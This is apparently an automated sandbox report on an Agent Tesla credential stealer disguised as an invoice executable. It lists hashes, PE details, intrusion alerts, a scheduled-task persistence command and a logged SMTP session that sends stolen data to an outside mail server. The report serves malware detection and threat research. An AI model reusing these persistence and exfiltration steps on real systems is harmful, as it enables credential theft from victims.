                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.486735500072679
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:INVOICE OUTSTANDING.exe
                                        File size:1031168
                                        MD5:0fa9d94d6393235f67a17b220902dbfa
                                        SHA1:3c0ae56ab072f622da13806b4336f01f7137ee4c
                                        SHA256:65ea111f533e1283b202b87434ea207410c1680eadc9b2193c76179eb87decfc
                                        SHA512:1c2d817addc45161e63667895e1c54306e5f8f27f4804d6d7a06163b62451b3189e7fa6608b24bb7dd8969b23285286e82750351f1322b2714a31546fab9b5c5
                                        SSDEEP:24576:ru18pEJHoMv9vxksAEtn1vH2sP6BqoFi/ep:iipE1oMvPpCsVcpp
                                        TLSH:2D25E0A069EC715AE03912B132F064EA57F6AC37C914D22C7D96B76F87B3EC100A3593
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............P.............V.... ........@.. ....................... ............@................................

                                        File Icon

                                        Icon Hash:f9c9a99884c2d218

                                        Static PE Info

                                        General

                                        Entrypoint:0x4ce656
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x62F102BE [Mon Aug 8 12:34:06 2022 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xce6040x4f.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xd00000x2ee1c.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1000000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xcc65c0xcc800False0.8614224384932763data7.770423052382821IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0xd00000x2ee1c0x2f000False0.3779141040558511data5.52480890734526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x1000000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0xd02b00x6e15PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                        RT_ICON0xd70c80x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                        RT_ICON0xe78f00x94a8data
                                        RT_ICON0xf0d980x5488data
                                        RT_ICON0xf62200x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 12648447, next used block 2130706432
                                        RT_ICON0xfa4480x25a8data
                                        RT_ICON0xfc9f00x10a8data
                                        RT_ICON0xfda980x988data
                                        RT_ICON0xfe4200x468GLS_BINARY_LSB_FIRST
                                        RT_GROUP_ICON0xfe8880x84data
                                        RT_VERSION0xfe90c0x324data
                                        RT_MANIFEST0xfec300x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        192.168.2.343.255.154.57497635872839723 08/08/22-20:20:11.732977TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49763587192.168.2.343.255.154.57
                                        192.168.2.343.255.154.57497635872851779 08/08/22-20:20:11.733160TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49763587192.168.2.343.255.154.57
                                        192.168.2.343.255.154.57497635872840032 08/08/22-20:20:11.733160TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249763587192.168.2.343.255.154.57
                                        192.168.2.343.255.154.57497635872030171 08/08/22-20:20:11.732977TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49763587192.168.2.343.255.154.57

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Aug 8, 2022 20:20:08.485892057 CEST49763587192.168.2.343.255.154.57
                                        Aug 8, 2022 20:20:08.739192009 CEST5874976343.255.154.57192.168.2.3
                                        Aug 8, 2022 20:20:08.739322901 CEST49763587192.168.2.343.255.154.57
                                        Aug 8, 2022 20:20:09.421390057 CEST5874976343.255.154.57192.168.2.3
                                        Aug 8, 2022 20:20:09.421747923 CEST49763587192.168.2.343.255.154.57
                                        Aug 8, 2022 20:20:09.675313950 CEST5874976343.255.154.57192.168.2.3
                                        Aug 8, 2022 20:20:09.759871006 CEST49763587192.168.2.343.255.154.57
                                        Aug 8, 2022 20:20:09.849378109 CEST49763587192.168.2.343.255.154.57
                                        Aug 8, 2022 20:20:10.103190899 CEST5874976343.255.154.57192.168.2.3
                                        Aug 8, 2022 20:20:10.117631912 CEST49763587192.168.2.343.255.154.57
                                        Aug 8, 2022 20:20:10.390836954 CEST5874976343.255.154.57192.168.2.3
                                        Aug 8, 2022 20:20:10.438348055 CEST49763587192.168.2.343.255.154.57
                                        Aug 8, 2022 20:20:10.691970110 CEST5874976343.255.154.57192.168.2.3
                                        Aug 8, 2022 20:20:10.692256927 CEST49763587192.168.2.343.255.154.57
                                        Aug 8, 2022 20:20:10.985178947 CEST5874976343.255.154.57192.168.2.3
                                        Aug 8, 2022 20:20:11.047105074 CEST5874976343.255.154.57192.168.2.3
                                        Aug 8, 2022 20:20:11.150580883 CEST49763587192.168.2.343.255.154.57
                                        Aug 8, 2022 20:20:11.445415020 CEST49763587192.168.2.343.255.154.57
                                        Aug 8, 2022 20:20:11.698849916 CEST5874976343.255.154.57192.168.2.3
                                        Aug 8, 2022 20:20:11.698982954 CEST5874976343.255.154.57192.168.2.3
                                        Aug 8, 2022 20:20:11.732976913 CEST49763587192.168.2.343.255.154.57
                                        Aug 8, 2022 20:20:11.733160019 CEST49763587192.168.2.343.255.154.57
                                        Aug 8, 2022 20:20:11.733853102 CEST49763587192.168.2.343.255.154.57
                                        Aug 8, 2022 20:20:11.733959913 CEST49763587192.168.2.343.255.154.57
                                        Aug 8, 2022 20:20:11.986447096 CEST5874976343.255.154.57192.168.2.3
                                        Aug 8, 2022 20:20:11.987082005 CEST5874976343.255.154.57192.168.2.3
                                        Aug 8, 2022 20:20:11.989464998 CEST5874976343.255.154.57192.168.2.3
                                        Aug 8, 2022 20:20:12.150705099 CEST49763587192.168.2.343.255.154.57

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Aug 8, 2022 20:20:08.416261911 CEST6333253192.168.2.38.8.8.8
                                        Aug 8, 2022 20:20:08.437103987 CEST53633328.8.8.8192.168.2.3

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Aug 8, 2022 20:20:08.416261911 CEST192.168.2.38.8.8.80x1581Standard query (0)mail.oceanskylogistics.inA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Aug 8, 2022 20:20:08.437103987 CEST8.8.8.8192.168.2.30x1581No error (0)mail.oceanskylogistics.in43.255.154.57A (IP address)IN (0x0001)

                                        SMTP Packets

                                        TimestampSource PortDest PortSource IPDest IPCommands
                                        Aug 8, 2022 20:20:09.421390057 CEST5874976343.255.154.57192.168.2.3220-sg2plcpnl0242.prod.sin2.secureserver.net ESMTP Exim 4.94.2 #2 Mon, 08 Aug 2022 11:20:09 -0700
                                        220-We do not authorize the use of this system to transport unsolicited,
                                        220 and/or bulk e-mail.
                                        Aug 8, 2022 20:20:09.421747923 CEST49763587192.168.2.343.255.154.57EHLO 320946
                                        Aug 8, 2022 20:20:09.675313950 CEST5874976343.255.154.57192.168.2.3250-sg2plcpnl0242.prod.sin2.secureserver.net Hello 320946 [102.129.143.3]
                                        250-SIZE 52428800
                                        250-8BITMIME
                                        250-PIPELINING
                                        250-PIPE_CONNECT
                                        250-AUTH PLAIN LOGIN
                                        250-CHUNKING
                                        250-STARTTLS
                                        250-SMTPUTF8
                                        250 HELP
                                        Aug 8, 2022 20:20:09.849378109 CEST49763587192.168.2.343.255.154.57AUTH login aW1wb3J0QG9jZWFuc2t5bG9naXN0aWNzLmlu
                                        Aug 8, 2022 20:20:10.103190899 CEST5874976343.255.154.57192.168.2.3334 UGFzc3dvcmQ6
                                        Aug 8, 2022 20:20:10.390836954 CEST5874976343.255.154.57192.168.2.3235 Authentication succeeded
                                        Aug 8, 2022 20:20:10.438348055 CEST49763587192.168.2.343.255.154.57MAIL FROM:<import@oceanskylogistics.in>
                                        Aug 8, 2022 20:20:10.691970110 CEST5874976343.255.154.57192.168.2.3250 OK
                                        Aug 8, 2022 20:20:10.692256927 CEST49763587192.168.2.343.255.154.57RCPT TO:<ajay@mbff.co.in>
                                        Aug 8, 2022 20:20:11.047105074 CEST5874976343.255.154.57192.168.2.3250 Accepted
                                        Aug 8, 2022 20:20:11.445415020 CEST49763587192.168.2.343.255.154.57DATA
                                        Aug 8, 2022 20:20:11.698982954 CEST5874976343.255.154.57192.168.2.3354 Enter message, ending with "." on a line by itself
                                        Aug 8, 2022 20:20:11.733959913 CEST49763587192.168.2.343.255.154.57.
                                        Aug 8, 2022 20:20:11.989464998 CEST5874976343.255.154.57192.168.2.3250 OK id=1oL7MJ-00GBzl-Gn

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:20:20:10
                                        Start date:08/08/2022
                                        Path:C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\INVOICE OUTSTANDING.exe"
                                        Imagebase:0xa30000
                                        File size:1031168 bytes
                                        MD5 hash:0FA9D94D6393235F67A17B220902DBFA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_AgentTesla_e577e17e, Description: unknown, Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low

                                        General

                                        Target ID:2
                                        Start time:20:20:21
                                        Start date:08/08/2022
                                        Path:C:\Windows\System32\BackgroundTransferHost.exe
                                        Wow64 process (32bit):false
                                        Commandline:"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                        Imagebase:0x7ff6c2f90000
                                        File size:36864 bytes
                                        MD5 hash:02BA81746B929ECC9DB6665589B68335
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Target ID:12
                                        Start time:20:20:38
                                        Start date:08/08/2022
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" /XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp
                                        Imagebase:0xe60000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:13
                                        Start time:20:20:40
                                        Start date:08/08/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7c9170000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:14
                                        Start time:20:20:41
                                        Start date:08/08/2022
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0xf30000
                                        File size:45152 bytes
                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_AgentTesla_e577e17e, Description: unknown, Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high

                                        General

                                        Target ID:18
                                        Start time:20:21:02
                                        Start date:08/08/2022
                                        Path:C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"
                                        Imagebase:0x990000
                                        File size:45152 bytes
                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Antivirus matches:
                                        • Detection: 0%, Metadefender, Browse
                                        • Detection: 0%, ReversingLabs
                                        Reputation:high

                                        General

                                        Target ID:19
                                        Start time:20:21:03
                                        Start date:08/08/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7c9170000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:20
                                        Start time:20:21:11
                                        Start date:08/08/2022
                                        Path:C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"
                                        Imagebase:0x510000
                                        File size:45152 bytes
                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        General

                                        Target ID:21
                                        Start time:20:21:11
                                        Start date:08/08/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7c9170000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        No disassembly